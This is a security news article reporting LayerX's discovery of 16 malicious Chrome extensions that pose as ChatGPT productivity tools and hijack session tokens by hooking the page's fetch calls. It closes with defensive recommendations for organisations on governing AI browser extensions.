As AI productivity tools surge in popularity, attackers are quietly abusing malicious Chrome extensions to hijack ChatGPT accounts and extract sensitive data.
Although the campaign is still in its early stages, LayerX researchers warn it reveals a growing security blind spot for organizations adopting generative AI.
”Every organization worried about shadow AI should be equally worried about shadow browser extensions. Employees install these tools to boost productivity, but each one is a potential backdoor into corporate AI environments,” said Natalie Zargarov, security researcher at LayerX in an email to eSecurityPlanet.
She added, “When a ChatGPT session gets compromised, attackers inherit access to everything that the user discussed — proprietary code, confidential analysis, and strategic planning.”
Natalie also explained, “This is an organized operation, not opportunistic malware, and it’s designed to blend in until the install numbers justify more aggressive distribution.”
Inside the Malicious ChatGPT Extension Campaign
LayerX researchers uncovered the coordinated campaign involving 16 malicious browser extensions masquerading as ChatGPT enhancement and productivity tools.
While these extensions appear legitimate and offer real functionality, their primary purpose is to steal users’ ChatGPT session authentication tokens — granting attackers silent, account-level access to victim accounts.
So far, the campaign has amassed roughly 900 downloads, a relatively small number compared to larger extension-based threats such as GhostPoster or RolyPoly VPN.
However, the researchers stress that scale alone is a poor indicator of risk. AI productivity extensions are rapidly gaining traction, and it only takes a single iteration to reach widespread adoption — especially when tools closely resemble trusted brands.
How the Attack Works
The extensions do not exploit vulnerabilities in ChatGPT itself.
Instead, they abuse legitimate browser extension capabilities to intercept authentication artifacts during normal application runtime.
Once installed, the extensions inject content scripts directly into chatgpt[.]com and execute them within the browser’s MAIN JavaScript world — the same execution context used by the ChatGPT web application.
Running in this environment gives the extensions deep visibility into the application’s internal behavior.
Session Hijacking
The malicious scripts hook native browser APIs such as window.fetch, allowing them to observe outbound requests generated by ChatGPT.
When a request containing authorization headers is detected, the session token is extracted and sent to an attacker-controlled backend.
Possession of this token allows attackers to authenticate to ChatGPT as the victim without triggering login prompts, MFA challenges, or security alerts.
From there, attackers inherit the user’s full permissions, including access to conversation history, metadata, proprietary code, confidential business analysis, and connected third-party services such as Google Drive, Slack, and GitHub.
In effect, a single compromised session can expose an organization’s most sensitive AI-driven workflows.
Because the attack relies on valid session tokens rather than stolen credentials, exploits, or traditional malware, it is difficult to detect using conventional endpoint or network security controls.
The extensions operate entirely within expected browser behavior, blending in alongside legitimate AI productivity tools and evading many existing defenses.
Beyond session tokens, the extensions also exfiltrate additional metadata, including extension version information, locale settings, usage telemetry, and backend-issued access tokens.
When aggregated, this data enables persistent user identification, behavioral profiling, and persistent access across multiple sessions — increasing both privacy risks and the potential blast radius of abuse.
One of the malicious extensions also carried Chrome’s “featured” badge, signaling compliance with recommended development practices.
Reducing Risk From AI Browser Extensions
As AI productivity tools become embedded in everyday workflows, browser extensions are emerging as a high-risk but often overlooked attack surface.
The malicious extensions identified by LayerX demonstrate how easily trusted-looking tools can be abused to gain persistent access to sensitive AI accounts without exploiting traditional software vulnerabilities.
Organizations should apply a layered, proactive approach to governing AI browser extensions.
- Treat AI browser extensions as high-risk software by restricting, approving, and regularly auditing extensions that interact with authenticated AI services.
- Enforce enterprise browser policies that limit extension permissions, block script injection on sensitive domains, and require managed browsers for AI access.
- Monitor for anomalous AI account behavior, including unusual session activity, token reuse, geographic anomalies, and suspicious connector access.
- Reduce blast radius by applying least-privilege access, limiting AI connector integrations, and enforcing segmentation for accounts using generative AI tools.
- Deploy browser-level threat detection and extension intelligence to identify malicious behaviors such as API hooking, token interception, and suspicious backend communication.
- Train employees on the risks of unofficial AI productivity tools and lookalike extensions, and incorporate browser extensions into third-party risk governance.
- Regularly test and update incident response plans to ensure teams can detect, contain, and remediate browser-based AI account compromise scenarios.
Collectively, these steps help organizations detect abuse early, limit blast radius, and strengthen resilience against extension-based AI threats.
AI Browser Extensions Are a Growing Risk
This campaign underscores how the browser has quietly become a frontline security boundary for enterprise AI adoption.
As generative AI tools continue to move deeper into business-critical workflows, attackers are increasingly targeting the surrounding ecosystem rather than the platforms themselves.
Malicious browser extensions — trusted by users, difficult to monitor, and capable of inheriting powerful permissions — represent a growing supply chain risk that many organizations are still working to fully address.
Addressing this kind of implicit trust requires a shift toward zero-trust approaches that continuously verify users, devices, and applications.
